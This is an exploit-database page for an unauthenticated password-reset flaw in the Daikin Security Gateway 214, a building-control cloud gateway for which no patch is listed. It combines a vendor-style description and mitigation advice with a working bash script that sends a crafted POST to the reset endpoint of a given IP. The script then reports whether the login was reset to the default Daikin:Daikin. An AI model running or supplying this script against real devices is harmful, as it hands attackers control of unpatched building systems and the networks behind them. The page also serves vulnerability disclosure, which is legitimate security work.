Daikin Security Gateway 214 - Remote Password Reset

vendor:

Daikin Security Gateway 214

by:

Gjoko 'LiquidWorm' Krstic

8.1

CVSS

CRITICAL

Insecure Direct Object Reference (IDOR)

285

CWE

Product Name: Daikin Security Gateway 214

Affected Version From: App: 100, Frm: 214

Affected Version To: App: 100, Frm: 214

Patch Exists: NO

Related CWE:

CPE: h:daikin_industries:security_gateway_214

Metasploit:

Other Scripts:

Platforms Tested: fasthttp

2025

Daikin Security Gateway 214 – Remote Password Reset

The Daikin Security Gateway 214 is vulnerable to an IDOR flaw in its password reset API endpoint. An attacker can exploit this vulnerability by sending a crafted POST request, bypassing authentication mechanisms. Successful exploitation results in resetting the system credentials to the default Daikin:Daikin username and password combination, granting unauthorized access to the system and potentially compromising connected devices and networks.

Mitigation:

It is recommended to update the Daikin Security Gateway to a patched version that addresses this vulnerability. Additionally, restricting access to the password reset API endpoint and implementing strong authentication mechanisms can help mitigate the risk of exploitation.

Source

Exploit-DB raw data:

# Daikin Security Gateway 214 - Remote Password Reset
# Vendor: Daikin Industries, Ltd.
# Product web page: https://www.daikin.com
# https://www.daikin.eu/en_us/products/product.html/DRGATEWAYAA.html
# Affected version: App: 100, Frm: 214
#
# Summary: The Security gateway allows the iTM and LC8 controllers
# to connect through the Security gateway to the Daikin Cloud Service.
# Instead of sending the report to the router directly, the iTM or
# LC8 controller sends the report to the Security gateway first. The
# Security gateway transforms the report format from http to https
# and then sends the transformed https report to the Daikin Cloud
# Service via the router. Built-in LAN adapter enabling online control.
#
# Desc: The Daikin Security Gateway exposes a critical vulnerability
# in its password reset API endpoint. Due to an IDOR flaw, an unauthenticated
# attacker can send a crafted POST request to this endpoint, bypassing
# authentication mechanisms. Successful exploitation resets the system
# credentials to the default Daikin:Daikin username and password combination.
# This allows attackers to gain unauthorized access to the system without
# prior credentials, potentially compromising connected devices and networks.
#
# Tested on: fasthttp
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2025-5931
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5931.php
#
#
# 21.03.2025
#

[ $# -ne 1 ] && { echo "Usage: $0 <target_ip>"; exit 1; }

TARGET_IP="$1"
URL="https://$TARGET_IP/api/settings/password/reset"
PAYLOAD="t00t"

[[ ! $TARGET_IP =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && { echo "Bad IP."; exit 1; }

RESPONSE=$(curl -kX POST "$URL" -H "Content-type: application/json" -d "$PAYLOAD" 2>/dev/null)

[ $? -ne 0 ] && { echo "Can’t reach $TARGET_IP."; exit 1; }

if [[ $RESPONSE =~ \"Error\":0 ]]; then
  echo "Reset worked! Vulnerable."
elif [[ $RESPONSE =~ \"Error\":1 ]]; then
  echo "Not vulnerable."
else
  echo "Got: $RESPONSE"
fi